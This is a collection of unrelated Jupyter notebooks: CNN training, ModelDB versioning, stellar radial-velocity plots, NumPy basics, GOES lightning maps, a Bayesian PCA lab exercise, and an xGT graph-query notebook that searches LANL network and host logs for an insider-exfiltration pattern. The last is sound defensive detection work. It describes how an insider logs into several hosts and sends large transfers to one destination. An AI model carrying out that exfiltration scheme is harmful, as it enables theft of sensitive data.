val_ds.shuffle(256).batch(BATCH_SIZE, drop_remainder=True).prefetch(tf.data.experimental.AUTOTUNE) val_ds = val_ds.cache(filename='cached_val_ds') test_ds = test_ds.shuffle(256).batch(BATCH_SIZE, drop_remainder=True).prefetch(tf.data.experimental.AUTOTUNE) test_ds = test_ds.cache(filename='cached_test_ds') print( f'Training dataset contains {train_ds.cardinality().numpy() * BATCH_SIZE} images after data augmentation.', f'Validation dataset contains {val_ds.cardinality().numpy() * BATCH_SIZE} images.', sep='\n') ``` # Training ``` from utils import NR_EPOCHS tf.keras.backend.clear_session() ``` ## AlexNet A simple AlexNet as described in Krizhevsky et al., 2012. ``` from models.alexNet import create_compiled_alexnet alexNet = create_compiled_alexnet() alexNet.summary() # Preparing and opening a tensorboard instance to observe training log_dir = 'logs/alexNet/' + datetime.datetime.now().strftime('%Y%m%d-%H%M%S') tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1) %tensorboard --logdir=logs alexNet.fit( train_ds, epochs=NR_EPOCHS, validation_data=val_ds, callbacks=[tensorboard_callback]) alexNet.evaluate( test_ds, callbacks=tensorboard_callback, return_dict=True) ``` ## EfficientNetV2 For comparison, we bring in a pre-trained EfficientNetV2-B0 as per Tan and Le (2021). ``` from models.efficientNetV2 import create_compiled_EfficientNetV2 efficientNet = create_compiled_EfficientNetV2(trainable=True) efficientNet.summary() log_dir = 'logs/efficientNet/' + datetime.datetime.now().strftime('%Y%m%d-%H%M%S') tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1) %tensorboard --logdir=logs efficientNet.fit( train_ds, epochs=NR_EPOCHS, validation_data=val_ds, callbacks=[tensorboard_callback]) efficientNet.evaluate( test_ds, callbacks=tensorboard_callback, return_dict=True) ``` ## InceptionV3 ``` from models.inceptionV3 import create_compiled_inceptionV3 inception = create_compiled_inceptionV3(trainable=True) inception.summary() log_dir = 'logs/inception/' + datetime.datetime.now().strftime('%Y%m%d-%H%M%S') tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1) %tensorboard --logdir=logs inception.fit( train_ds, epochs=30, validation_data=val_ds, callbacks=[tensorboard_callback]) inception.evaluate( test_ds, callbacks=tensorboard_callback, return_dict=True) ```
github_jupyter
# Versioning Example (Part 2/3) In part 1, we trained and logged a tweet sentiment classifier using ModelDB's versioning system. Now we'll see how that can come in handy when we need to revisit or even revert changes we make. This workflow requires ``verta>=0.14.4`` and ``spaCy>=2.0.0``. --- # Setup As before, import libraries we'll need... ``` from __future__ import unicode_literals, print_function import boto3 import json import numpy as np import pandas as pd import spacy ``` ...and instantiate Verta's ModelDB Client. ``` from verta import Client client = Client('http://localhost:3000/') proj = client.set_project('Tweet Classification') expt = client.set_experiment('SpaCy') ``` --- # Prepare Data This time, things are a little different. Let's say someone has provided us with a new, expermental dataset that supposedly will improve our model. Unbeknownst to everyone, this dataset actually only contains *one* of the two classes we're interested in. This is going to hurt our performance, but we don't know it yet. Before, we trained a model on `english-tweets.csv`. Now, we're going to train with **`positive-english-tweets.csv`**. ``` S3_BUCKET = "verta-starter" S3_KEY = "positive-english-tweets.csv" FILENAME = S3_KEY boto3.client('s3').download_file(S3_BUCKET, S3_KEY, FILENAME) import utils data = pd.read_csv(FILENAME).sample(frac=1).reset_index(drop=True) utils.clean_data(data) data.head() ``` --- # Capture and Version Model Ingredients As with before, we'll capture and log our model ingredients directly onto our repository's `master` branch. ``` from verta.code import Notebook from verta.configuration import Hyperparameters from verta.dataset import S3 from verta.environment import Python code_ver = Notebook() # Notebook & git environment config_ver = Hyperparameters({'n_iter': 20}) dataset_ver = S3("s3://{}/{}".format(S3_BUCKET, S3_KEY)) env_ver = Python(Python.read_pip_environment()) # pip environment and Python version repo = client.set_repository('Tweet Classification') commit = repo.get_commit(branch='master') commit.update("notebooks/tweet-analysis", code_ver) commit.update("config/hyperparams", config_ver) commit.update("data/tweets", dataset_ver) commit.update("env/python", env_ver) commit.save("Update tweet dataset") commit ``` You may verify through [the Web App](http://localhost:3000/) that this commit updates the dataset, as well as the Notebook. --- # Train and Log Model Again as before, we'll train the model and log it along with the commit to an Experiment Run. ``` nlp = spacy.load('en_core_web_sm') import training training.train(nlp, data, n_iter=20) run = client.set_experiment_run() run.log_model(nlp) run.log_commit( commit, { 'notebook': "notebooks/tweet-analysis", 'hyperparameters': "config/hyperparams", 'training_data': "data/tweets", 'python_env': "env/python", }, ) ``` --- # Revert Commit Looking back over our workflow, we might notice that there's something suspicious about the model's precision, recall, and F-score. This model isn't performing as it should, and we don't want it to be the latest commit in `master`. Using the Client, we'll revert the commit. ``` commit commit.revert() commit ``` As easy as that—we have a new commit on `master` that reverted our grave mistake. Again, [the Web App](http://localhost:3000/) will show that the change from `english-tweets.csv` to `positive-english-tweets.csv` has been undone. ---
github_jupyter
``` import os # Third-party from astropy.io import fits import astropy.time as atime import astropy.units as u import matplotlib.pyplot as plt import numpy as np plt.style.use('apw-notebook') %matplotlib inline from ebak.singleline import RVData, OrbitModel from ebak.units import usys from ebak import SimulatedRVOrbit PLOT_PATH = "../plots/troup-fits" if not os.path.exists(PLOT_PATH): os.mkdir(PLOT_PATH) troup = np.genfromtxt("../data/troup16-dr12.csv", delimiter=",", names=True, dtype=None) allVisit = fits.getdata("../data/allVisit-l30e.2.fits", 1) v_err_max = np.nanmax(np.vstack((allVisit['VRELERR'], allVisit['ESTVRELERR'], allVisit['SYNTHVRELERR'])), axis=0) bins = np.logspace(-3,1,16) #plt.hist(v_err_max, bins=bins) for _verr in [allVisit['VRELERR'], allVisit['ESTVRELERR'], allVisit['SYNTHVRELERR']]: plt.hist(_verr[np.isfinite(_verr)], bins=bins, alpha=0.2) plt.xscale('log') plt.xlabel(r'$\sigma_{rv}$ [km/s]') plt.plot(allVisit['J'], allVisit['VRELERR'], ls='none', alpha=0.4, marker=',') plt.yscale('log') plt.xlim(2, 20) plt.ylim(1E-3, 1E1) plt.xlabel('$J$ [mag]') plt.ylabel(r'$\sigma_{rv}$ [km/s]') # Make the same panels as Figure 5 in Troup+2016 troup_ids = ['2M00283971+8530377', '2M13131777+1705326', '2M03080601+7950502'] data_style = dict(marker='o', ecolor='#666666', linestyle='none', alpha=0.75, color='k', label='APOGEE data') model_style = dict(marker=None, linestyle='-', color='#de2d26', alpha=0.6, label='Troup orbit') for apogee_id in troup_ids: fig,ax = plt.subplots(1,1,figsize=(8,6)) target = allVisit[allVisit['APOGEE_ID'].astype(str) == apogee_id] troup_row = troup[troup['APOGEE_ID'].astype(str) == apogee_id] # get APOGEE data for RV measurements data_t = atime.Time(target['JD'], format='jd') # TODO: is this Barycentric? , scale='tcb' data_rv = np.array(target['VHELIO']) * u.km/u.s data_rv_err = (np.array(target['VRELERR'])*u.km/u.s)**2 # TODO: is this the correct uncertainty to use? # convert data time to phase P = troup_row['PERIOD'] * u.day t0 = atime.Time(troup_row['T0'], format='jd') # TODO: is this Barycentric? data_phase = ((data_t - t0) / P) % 1. # get orbital parameters ecc = troup_row['ECC'] K = troup_row['SEMIAMP']*u.m/u.s print(K) mf,asini = SimulatedRVOrbit.P_K_ecc_to_mf_asini_ecc(P, K, ecc) omega = troup_row['OMEGA']*u.degree phi0 = 2*np.pi*t0.mjd / P.to(u.day).value * u.radian troup_orbit = SimulatedRVOrbit(P=P, a_sin_i=asini, ecc=ecc, omega=omega, phi0=phi0, v0=0*u.km/u.s) # remove long-period velocity trend from data v0 = troup_row['V0']*u.m/u.s acc = troup_row['SLOPE']*u.m/u.s/u.day v_trend = v0 + acc*data_t.jd*u.day data_rv = data_rv - v_trend # TODO: is this how the data are plotting in Troup? # generate times to evaluate model from minimum time to time + 1 period model_t = data_t.min() + atime.TimeDelta(np.linspace(0, P.value, 1024)*P.unit) model_rv = troup_orbit.generate_rv_curve(model_t).to(u.km/u.s) model_phase = ((model_t - t0) / P) % 1. idx = model_phase.argsort() ax.plot(model_phase[idx], model_rv[idx], **model_style) ax.plot(model_phase[idx]-1, model_rv[idx], **model_style) ax.plot(model_phase[idx]+1, model_rv[idx], **model_style) ax.errorbar(data_phase, data_rv.value, data_rv_err.value, **data_style) ax.set_xlim(-0.1,1.1) ax.set_xlabel("Phase") ax.set_ylabel("RV [km/s]") ax.set_title(apogee_id) # fig.savefig(os.path.join(PLOT_PATH, "{}.png".format(troup_row['APOGEE_ID'].astype(str))), dpi=72) ```
github_jupyter
# Insider Exfiltration ---- We are looking for this graph pattern in the large data graph referred to as the [LANL Unified Host and Network Dataset](https://datasets.trovares.com/cyber/LANL/index.html), a set of netflow and host event data collected on an internal Los Alamos National Lab network. The LANL dataset consists of: - Netflow data (aggregated and sessionized) - Windows Logging Events - 1: events that involve exactly one device such as *reboot* - Windows Logging Events - 2: events that involve exactly two devices such as *failed authentication attempt from device A to device B* ## Motivation for graph pattern This notebook shows one kind of *graph pattern search* following the recommendations of the [Common Sense Guide to Mitigating Insider Threats, Fifth Edition](https://resources.sei.cmu.edu/asset_files/TechnicalReport/2016_005_001_484758.pdf). This graph pattern is motived by the following scenario: - An employee is working with a competitor to exfiltrate sensitive data - They do this by logging in to multiple systems within the enterprise that hold the sensitive data - From each sensitive data store, they launch a program that sends data out to a common exfiltration target This pattern is shown here: <img src="images/insider-xfil.png" alt="Insider Exfiltration" /> where: - the red edges from A to B, C, and D, are all *successful authentication* (login) events - the purple edges that are self-loops are all *program start* events - the black edges from B, C, and D to E are all netflow records with high byte counts going to the same destination port at device E. ---- ## Using xGT to perform this search The rest of this notebook demonstrates how to take this LANL data and the search pattern description to do these steps: 1. Ingest the cyber data into xGT 2. Search for all occurrences of this pattern. ``` import xgt conn = xgt.Connection() conn ``` ## Establish Graph Component Schemas We first try to retrieve the graph component schemas from xGT server. If that should fail, we create an empty component (vertex or edge frame) for the missing component. ``` try: devices = conn.get_vertex_frame('Devices') except xgt.XgtNameError: devices = conn.create_vertex_frame( name='Devices', schema=[['device', xgt.TEXT]], key='device') devices try: netflow = conn.get_edge_frame('Netflow') except xgt.XgtNameError: netflow = conn.create_edge_frame( name='Netflow', schema=[['epochtime', xgt.INT], ['duration', xgt.INT], ['srcDevice', xgt.TEXT], ['dstDevice', xgt.TEXT], ['protocol', xgt.INT], ['srcPort', xgt.INT], ['dstPort', xgt.INT], ['srcPackets', xgt.INT], ['dstPackets', xgt.INT], ['srcBytes', xgt.INT], ['dstBytes', xgt.INT]], source=devices, target=devices, source_key='srcDevice', target_key='dstDevice') netflow ``` **Edges:** The LANL dataset contains two types of data: netflow and host events. Of the host events recorded, some describe events within a device (e.g., reboots), and some describe events between devices (e.g., login attempts). We'll only be loading the netflow data and in-device events. We call these events "one-sided", since we describe them as graph edges from one vertex to itself. ``` try: events1v = conn.get_edge_frame('Events1v') except xgt.XgtNameError: events1v = conn.create_edge_frame( name='Events1v', schema=[['epochtime', xgt.INT], ['eventID', xgt.INT], ['logHost', xgt.TEXT], ['userName', xgt.TEXT], ['domainName', xgt.TEXT], ['logonID', xgt.INT], ['processName', xgt.TEXT], ['processID', xgt.INT], ['parentProcessName', xgt.TEXT], ['parentProcessID', xgt.INT]], source=devices, target=devices, source_key='logHost', target_key='logHost') events1v try: events2v = conn.get_edge_frame('Events2v') except xgt.XgtNameError: events2v = conn.create_edge_frame( name='Events2v', schema = [['epochtime',xgt.INT], ['eventID',xgt.INT], ['logHost',xgt.TEXT], ['logonType',xgt.INT], ['logonTypeDescription',xgt.TEXT], ['userName',xgt.TEXT], ['domainName',xgt.TEXT], ['logonID',xgt.INT], ['subjectUserName',xgt.TEXT], ['subjectDomainName',xgt.TEXT], ['subjectLogonID',xgt.TEXT], ['status',xgt.TEXT], ['src',xgt.TEXT], ['serviceName',xgt.TEXT], ['destination',xgt.TEXT], ['authenticationPackage',xgt.TEXT], ['failureReason',xgt.TEXT], ['processName',xgt.TEXT], ['processID',xgt.INT], ['parentProcessName',xgt.TEXT], ['parentProcessID',xgt.INT]], source = 'Devices', target = 'Devices', source_key = 'src', target_key = 'logHost') events2v # Utility to print the sizes of data currently in xGT def print_data_summary(): print('Devices (vertices): {:,}'.format(devices.num_vertices)) print('Netflow (edges): {:,}'.format(netflow.num_edges)) print('Host event 1-vertex (edges): {:,}'.format(events1v.num_edges)) print('Host event 2-vertex (edges): {:,}'.format(events2v.num_edges)) print('Total (edges): {:,}'.format( netflow.num_edges + events1v.num_edges + events2v.num_edges)) print_data_summary() ``` ## Load the data If you are already connected to an xGT server with data loaded, this section may be skipped. You may skip ahead to the "**Utility python functions for interacting with xGT**" section. **Load the 1-sided host event data:** ``` %%time if events1v.num_edges == 0: urls = ["https://datasets.trovares.com/LANL/xgt/wls_day-85_1v.csv"] # urls = ["xgtd://wls_day-{:02d}_1v.csv".format(_) for _ in range(2,91)] events1v.load(urls) print_data_summary() ``` **Load the 2-sided host event data:** ``` %%time if events2v.num_edges == 0: urls = ["https://datasets.trovares.com/LANL/xgt/wls_day-85_2v.csv"] # urls = ["xgtd://wls_day-{:02d}_2v.csv".format(_) for _ in range(2,91)] events2v.load(urls) print_data_summary() ``` **Load the netflow data:** ``` %%time if netflow.num_edges == 0: urls = ["https://datasets.trovares.com/LANL/xgt/nf_day-85.csv"] #urls = ["xgtd://nf_day-{:02d}.csv".format(_) for _ in range(2,91)] netflow.load(urls) print_data_summary() ``` ## Utility python functions for interacting with xGT ---- Now define some useful functions and get on with the querying ... ``` # Utility function to launch queries and show job number: # The job number may be useful if a long-running job needs # to be canceled. import time def run_query(query, table_name = "answers", drop_answer_table=True, show_query=False): if drop_answer_table: conn.drop_frame(table_name) if query[-1] != '\n': query += '\n' query += 'INTO {}'.format(table_name) if show_query: print("Query:\n" + query) job = conn.schedule_job(query) print("Launched job {} at time: ".format(job.id, time.asctime())) conn.wait_for_job(job) table = conn.get_table_frame(table_name) return table ``` ## Looking for one path This query looks for only one path from A to E (through B) ``` %%time q = """ MATCH (E)<-[nf1:Netflow]-(B)<-[login1:Events2v]-(A), (B)<-[prog1:Events1v]-(B) WHERE A <> B AND B <> E AND A <> E AND login1.eventID = 4624 AND prog1.eventID = 4688 AND nf1.dstBytes > 100000000 // time constraints within each path AND login1.epochtime < prog1.epochtime AND prog1.epochtime < nf1.epochtime AND nf1.epochtime - login1.epochtime <= 30 RETURN count(*) """ data = run_query(q) print('Number of answers: {:,}'.format(data.get_data()[0][0])) ``` ## Looking for three paths This query looks for at least three paths from A to E (through B, C, and D) <img src="images/insider-xfil.png" alt="Insider Exfiltration" /> ``` %%time q = """ MATCH (E)<-[nf1:Netflow]-(B)<-[login1:Events2v]-(A), (B)<-[prog1:Events1v]-(B), (E)<-[nf2:Netflow]-(C)<-[login2:Events2v]-(A), (C)<-[prog2:Events1v]-(C), (E)<-[nf3:Netflow]-(D)<-[login3:Events2v]-(A), (D)<-[prog3:Events1v]-(D) WHERE A <> B AND A <> C AND A <> D AND A <> E AND B <> C AND B <> D AND B <> E AND C <> D AND C <> E AND D <> E AND login1.eventID = 4624 AND login2.eventID = 4624 AND login3.eventID = 4624 AND prog1.eventID = 4688 AND prog2.eventID = 4688 AND prog3.eventID = 4688 AND nf1.dstBytes > 100000000 AND nf2.dstBytes > 100000000 AND nf3.dstBytes > 100000000 // constraints across paths AND login1.epochtime < login2.epochtime AND login2.epochtime < login3.epochtime AND login3.epochtime - login1.epochtime < 3600 AND nf1.dstPort = nf2.dstPort AND nf2.dstPort = nf3.dstPort AND prog1.processName = prog2.processName AND prog2.processName = prog3.processName // time constraints within each path AND login1.epochtime < prog1.epochtime AND prog1.epochtime < nf1.epochtime AND nf1.epochtime - login1.epochtime <= 30 AND login2.epochtime < prog2.epochtime AND prog2.epochtime < nf2.epochtime AND nf2.epochtime - login2.epochtime <= 30 AND login3.epochtime < prog3.epochtime AND prog3.epochtime < nf3.epochtime AND nf3.epochtime - login3.epochtime <= 30 RETURN login1.epochtime as time1, login2.epochtime as time2, login3.epochtime as time3, login3.epochtime - login1.epochtime as interval, nf1.dstPort as dport1, nf2.dstPort as dport2, nf3.dstPort as dport3 """ data = run_query(q) print('Number of answers: {:,}'.format(data.num_rows)) pdata = data.get_data_pandas() pdata ```
github_jupyter
### Introduction To Numpy #### Wait... why am I learning this again? I already know lists! Untill now, we all know Python lists are powerful! <ul> <li>They can hold collection of values</li> <li>They can hold different types of data</li> <li>We can change, add or remove the items inside of a list</li> </ul> buttttt one important thing is missing. **the ability to perform a mathematical operation over *all* the items at the same time** Let's explore what I exactly mean by this. We have the heights and weights of my family members right here: ``` heights = [1.73, 1.68, 1.79, 1.92, 1.50, 1.64] weights = [90.0, 71.0, 55.0, 67.0, 99.2, 69] ``` If we want to calculate the BMI of each person, the fastest thing we hope that's gonna work would be the following: ``` weights/heights**2 ``` oh oh :( Python has no idea what we're talking about. well no worries, that's why we have **Numpy**! Numpy has its own array, which is an alternative for our regular Python lists. We simply call them **numpy arrays** [in case you haven't installed numpy, run the following cell] ``` !pip3 install numpy import numpy as np ``` Let's *convert* our previous lists into numpy arrays and see if we can perform the one-liner in line2! ``` heights_np = np.array(heights) heights_np weights_np = np.array(weights) weights_np weights_np/heights_np**2 ``` **Important Note : Numpy arrays can ONLY contain ONE data-type** ``` example = [2, 6.5, '4'] example_np = np.array(example) example_np ``` ##### Sum of two numpy arrays ``` weights_np + heights_np ``` ##### Numpy Array Subsetting ``` weights_np weights_np[3] ``` #### Task A list baseball has already been defined in the Python script, representing the height of some baseball players in centimeters. Can you add some code here and there to create a numpy array from it? ``` baseball = [180, 215, 210, 210, 188, 176, 209, 200] #INSERT YOUR CODE HERE ``` Use `np_height_m` and `np_weigh`t to calculate the **BMI** of each player. Use the following equation: `weight/height ** 2` Save the resulting numpy array as **bmi**. Print out bmi. ``` weights = [90.0, 71.0, 120.0, 97.0, 99.2, 100,90, 100] # Calculate the BMI: bmi # Print out bmi len(np_weight) ``` ### 2-D Arrays Usually our data is made up of **columns** and **rows**, meaning our data is *multidimensional* ``` months = [1, 2, 3] prices = [238.11, 237.81, 238.91] cpi_array = np.array([months, prices]) cpi_array ``` Wait how do we index our array now??! **array[row_index, column_index]** ``` #Insert Your Code Here ``` ✨What do you think this slice represents? `cpi_array[:, 2]` ``` cpi_array[:, 2] cpi_array[:, 1] cpi_array[0, :] ``` Your Answer ### Useful stuff we can do with numpy arrays - np.mean() - np.std() - np.arrange() - np.transpose() -> switches rows and columns *** - np.shape - np.size **Question : what's the difference between `shape` and `size`?** ``` array = np.array([[1,2,3,4], [1230, 2445, 3455, 34656]]) array array.shape array.size ``` ✨**Task** We have two lists (months and earnings) in the following cell. perform the following steps in order: - Create a 2D array of months and earnings and store in `arr` - Print the shape of arr - Print the size of arr - Slice out the earnings and save it in `arr_earnings` (row 1, all values of columns) - Calculate the mean of `arr_earnings` - Transpose `arr` and print it ``` months = [1,2,3,4,5] earnings = [3200, 5677, 8928, 1298, 2390] #INSERT YOUR CODE HERE ``` **Take aways from this notebook;** - How to create numpy arrays - How to sum numpy arrays - How to use numpy arrays
github_jupyter
# Plot the flash product of the GLM This jupyter notebook shows how to make a sub-region plot of the flash product of the GLM. Import the GOES package. ``` import GOES ``` Search GLM files. ``` flist=GOES.locate_files('/home/joao/Downloads/GOES-16/GLM/', 'OR_GLM*.nc', '20201019-235500', '20201020-000000') ``` Reads the files. ``` ds = GOES.open_mfdataset(flist) ``` Prints the contents of the files. ``` print(ds) ``` Set the map domain. ``` domain = [-100.0,-20.0,-40.0,40.0] ``` Gets longitude and latitude of flash product of GLM. ``` flash_lon = ds.variable('flash_lon') flash_lat = ds.variable('flash_lat') ``` Gets time interval between first and last file. ``` time_bounds = ds.variable('product_time_bounds') time_start = time_bounds.data[0,0] time_end = time_bounds.data[-1,-1] ``` Creates a grid map. ``` pix_resol = 2.0 gridmap_LonCor, gridmap_LatCor = GOES.create_gridmap(domain, PixResol=pix_resol) ``` Accumulates flash over grid map. ``` dens = GOES.accumulate_in_gribmap(flash_lon, flash_lat, gridmap_LonCor, gridmap_LatCor) ``` Gets information about data. ``` sat = ds.attribute('platform_ID')[0] ``` Sets product name. ``` name = 'Flash density' ``` Creates a custom color palette using the [custom_color_palette](https://github.com/joaohenry23/custom_color_palette) package. ``` # import packages import custom_color_palette as ccp # set the colors of the custom palette paleta1 = [['black'], [0,1]] paleta2 = [['yellow','darkorange','red','firebrick'], [1,5,10,15,20,25,30,40,50,60,70]] # pass parameters to the creates_palette module cmap, cmticks, norm, bounds = ccp.creates_palette([paleta1, paleta2], extend='max', lower_color='black', upper_color='maroon') # set ticks for colorbar ticks = cmticks ``` Creates plot. ``` # import packages import numpy as np import cartopy.crs as ccrs from cartopy.feature import NaturalEarthFeature from cartopy.mpl.ticker import LatitudeFormatter, LongitudeFormatter import matplotlib.pyplot as plt from matplotlib.dates import DateFormatter # calculates the central longitude of the plot lon_cen = 360.0+(domain[0]+domain[1])/2.0 # creates the figure fig = plt.figure('map', figsize=(4,4), dpi=200) ax = fig.add_axes([0.1, 0.16, 0.80, 0.75], projection=ccrs.PlateCarree(lon_cen)) ax.outline_patch.set_linewidth(0.3) # add the geographic boundaries l = NaturalEarthFeature(category='cultural', name='admin_0_countries', scale='50m', facecolor='none') ax.add_feature(l, edgecolor='white', linewidth=0.25) # plot the data img = ax.pcolormesh(gridmap_LonCor.data, gridmap_LatCor.data, dens.data, cmap=cmap, norm=norm, transform=ccrs.PlateCarree()) # add the colorbar cb = plt.colorbar(img, ticks=ticks, extend='max', orientation='horizontal', cax=fig.add_axes([0.12, 0.05, 0.76, 0.02])) cb.ax.tick_params(labelsize=5, labelcolor='black', width=0.5, direction='out', pad=1.0) cb.set_label(label='{}'.format(name), size=5, color='black', weight='normal') cb.outline.set_linewidth(0.5) # set the title ax.set_title('{} - {} - [{}x{}km]'.format(sat, name, pix_resol, pix_resol), fontsize=7, loc='left') ax.set_title('{:%Y/%m/%d %H:%M UTC}\n{:%Y/%m/%d %H:%M UTC}'.format(time_start, time_end), fontsize=7, loc='right') # Sets X axis characteristics dx = 15 xticks = np.arange(domain[0], domain[1]+dx, dx) ax.set_xticks(xticks, crs=ccrs.PlateCarree()) ax.xaxis.set_major_formatter(LongitudeFormatter(dateline_direction_label=True)) ax.set_xlabel('Longitude', color='black', fontsize=7, labelpad=3.0) # Sets Y axis characteristics dy = 15 yticks = np.arange(domain[2], domain[3]+dy, dy) ax.set_yticks(yticks, crs=ccrs.PlateCarree()) ax.yaxis.set_major_formatter(LatitudeFormatter()) ax.set_ylabel('Latitude', color='black', fontsize=7, labelpad=3.0) # Sets tick characteristics ax.tick_params(left=True, right=True, bottom=True, top=True, labelleft=True, labelright=False, labelbottom=True, labeltop=False, length=0.0, width=0.05, labelsize=5.0, labelcolor='black') # Sets grid characteristics ax.gridlines(xlocs=xticks, ylocs=yticks, alpha=0.6, color='gray', draw_labels=False, linewidth=0.25, linestyle='--') # set the map limits ax.set_extent([domain[0]+360.0, domain[1]+360.0, domain[2], domain[3]], crs=ccrs.PlateCarree()) plt.show() ```
github_jupyter
# Lab 3: Bayesian PCA ### Machine Learning II, 2016 * The lab exercises should be made in groups of two people. * The deadline for part 1 is Sunday, 15 May, 23:59. * Assignment should be sent to taco.cohen at gmail dot com. The subject line of your email should be "[MLII2016] lab3part1_lastname1\_lastname2". * Put your and your teammates' names in the body of the email * Attach the .IPYNB (IPython Notebook) file containing your code and answers. Naming of the file follows the same rule as the subject line. For example, if the subject line is "[MLII2016] lab01\_Kingma\_Hu", the attached file should be "lab3part1\_Kingma\_Hu.ipynb". Only use underscores ("\_") to connect names, otherwise the files cannot be parsed. Notes on implementation: * You should write your code and answers in an IPython Notebook: http://ipython.org/notebook.html. If you have problems, please contact us. * Among the first lines of your notebook should be "%pylab inline". This imports all required modules, and your plots will appear inline. * NOTE: test your code and make sure we can run your notebook / scripts! * NOTE: please write your answers directly below the question in the notebook. ### Introduction In this lab assignment, we will implement a variational algorithm for Bayesian PCA. Unlike regular PCA based on maximization of retained variance or minimization of projection error (see Bishop, 12.1.1 and 12.1.2), probabilistic PCA defines a proper density model over observed and latent variables. We will work with a fully Bayesian model this time, which is to say that we will put priors on our parameters and will be interested in learning the posterior over those parameters. Bayesian methods are very elegant, but require a shift in mindset: we are no longer looking for a point estimate of the parameters (as in maximum likelihood or MAP), but for a full posterior distribution over the space of parameters. The integrals involved in a Bayesian analysis are usually analytically intractable, so that we must resort to approximations. In this lab assignment, we will implement the variational method described in Bishop99. Chapters 10 and 12 of the PRML book contain additional material that may be useful when doing this exercise. * [Bishop99] Variational Principal Components, C. Bishop, ICANN 1999 - http://research.microsoft.com/pubs/67241/bishop-vpca-icann-99.pdf Below, you will find some code to get you started. ``` import scipy.special as sp import numpy as np import numpy.linalg import math import numpy as np import matplotlib.pyplot as plt import matplotlib.cm as plt_cm import matplotlib.colors as plt_col import sklearn.datasets as ds import cPickle, gzip, numpy %matplotlib inline ``` ### 1. The Q-distribution (5 points) In variational Bayes, we introduce a distribution $Q(\Theta)$ over parameters / latent variables in order to make inference tractable. We can think of $Q$ as being an approximation of a certain distribution. What function does $Q$ approximate, $p(D|\Theta)$, $p(\Theta|D)$, $p(D, \Theta)$, $p(\Theta)$, or $p(D)$, and how do you see that from the equation $\ln p(D) = \mathcal{L}(Q) + \mathrm{KL}(Q||P)$? (Hint: see eq. 11 in Bishop99) $$P(\theta|D)$$ because that makes KL zero. ### 2. The mean-field approximation (15 points) Equation 13 from [Bishop99] is a very powerful result: assuming only that $Q(\Theta)$ factorizes in a certain way (no assumptions on the functional form of the factors $Q_i$!), we get a set of coupled equations for the $Q_i$. However, the expression given in eq. 13 for Q_i contains a small mistake. Starting with the expression for the lower bound $\mathcal{L}(Q)$, derive the correct expression (and include your derivation). You can proceed as follows: first, substitute the factorization of $Q$ (eq. 12) into the definition of $\mathcal{L}(Q)$ and separate $\mathcal{L}(Q)$ into $Q_i$-dependent and $Q_i$-independent terms. At this point, you should be able to spot the expectations $\langle\cdot\rangle_{k \neq i}$ over the other $Q$-distributions that appear in Bishop's solution (eq. 13). Now, keeping all $Q_k, k \neq i$ fixed, maximize the expression with respect to $Q_i$. You should be able to spot the form of the optimal $\ln Q_i$, from which $Q_i$ can easily be obtained. ### 3. The log-probability (10 points) Write down the log-prob of data and parameters, $\ln p(\mathbf{X}, \mathbf{Z}, \mathbf{W}, \mathbf{\alpha}, \tau, \mathbf{\mu})$, in full detail (where $\mathbf{X}$ are observed, $\mathbf{Z}$ is latent; this is different from [Bishop99] who uses $\mathbf{T}$ and $\mathbf{X}$ respectively, but $\mathbf{X}$ and $\mathbf{Z}$ are consistent with the PRML book and are more common nowadays). Could we use the log-prob to assess the convergence of the variational Bayesian PCA algorithm? If yes, how? If no, why not? ### 4. The lower bound $\mathcal{L}(Q)$ (25 points) Derive an expression for the lower bound $\mathcal{L}(Q)$ of the log-prob $\ln p(X)$ for Bayesian PCA, making use of the factorization (eq. 12) and the form of the Q-distributions (eq. 16-20) as listed in [Bishop99]. Show your steps. Implement this function. The following result may be useful: For $x \sim \Gamma(a,b)$, we have $\langle \ln x\rangle = \ln b + \psi(a)$, where $\psi(a) = \frac{\Gamma'(a)}{\Gamma(a)}$ is the digamma function (which is implemented in numpy.special). ### 5. Optimize variational parameters (50 points) Implement the update equations for the Q-distributions, in the __update_XXX methods. Each update function should re-estimate the variational parameters of the Q-distribution corresponding to one group of variables (i.e. either $Z$, $\mu$, $W$, $\alpha$ or $\tau$). Hint: if you run into numerical instabilities resulting from the gamma function use the gammaln function from numpy.special. ``` class BayesianPCA(object): # X : data # def __init__(self, X, q=2, a_alpha=10e-3, b_alpha=10e-3, a_tau=10e-3, b_tau=10e-3, beta=10e-3): """ """ self.d = np.shape(X)[0] # number of dimensions self.N = np.shape(X)[1] # number of data points self.q = q self.X = X # data itself # Hyperparameters self.a_alpha = a_alpha self.b_alpha = b_alpha self.a_tau = a_tau self.b_tau = b_tau self.beta = beta # Variational parameters self.means_z = np.random.randn(q, self.N) # called x in bishop99 self.sigma_z = np.random.randn(q, q) self.means_mu = np.random.normal(0.0, 1.0, self.d) self.sigma_mu = np.random.randn(self.d, self.d) self.means_w = np.random.randn(self.d, self.q) self.sigma_w = np.random.randn(self.q, self.q) self.a_alpha_tilde = np.abs(np.random.randn(1)) self.b_alpha_tilde = np.abs(np.random.randn(self.q, 1)) self.a_tau_tilde = np.abs(np.random.randn(1)) self.b_tau_tilde = np.abs(np.random.randn(1)) def update(self): # compute gamma mean here as it's used in later updated self.gamma_mean = self.a_tau / self.b_tau self.__update_mu() self.__update_w() self.__update_z() self.__update_alpha() self.__update_tau() def __update_z(self): # updating covariance matrix I = np.eye(self.q) self.sigma_z = numpy.linalg.inv(I + self.gamma_mean * self.means_w.T.dot(self.means_w)) # updating mean ( note that mean is dependent on cov matrix computed previously) self.means_z = self.gamma_mean * self.sigma_z.dot(self.means_w.T).dot(self.X - self.means_mu[:, np.newaxis]) def __update_mu(self): # updating covariance matrix self.sigma_mu = math.pow(self.beta + self.N * self.gamma_mean, -1)*np.eye(self.d) # updating mean ( note that mean is dependent on cov matrix computed previously) mu = np.sum(self.X - self.means_w.dot(self.means_z),1) self.means_mu = self.gamma_mean * self.sigma_mu.dot(mu) def __update_w(self): alpha_mean = self.a_alpha_tilde/self.b_alpha_tilde alpha_mat = np.diag(alpha_mean) # updating covariance matrix z_cov = np.zeros((self.q,self.q)) for i in range(self.N): z = self.means_z[:,i] z = z[:,np.newaxis] z_cov += z.dot(z.T) self.sigma_w = np.linalg.inv(alpha_mat + self.gamma_mean * z_cov) # updating mean dif = self.X - self.means_mu[:, np.newaxis] self.means_w = (self.gamma_mean * self.sigma_w.dot(self.means_z.dot(dif.T))).T def __update_alpha(self): self.a_alpha_tilde = self.a_alpha + self.d/2 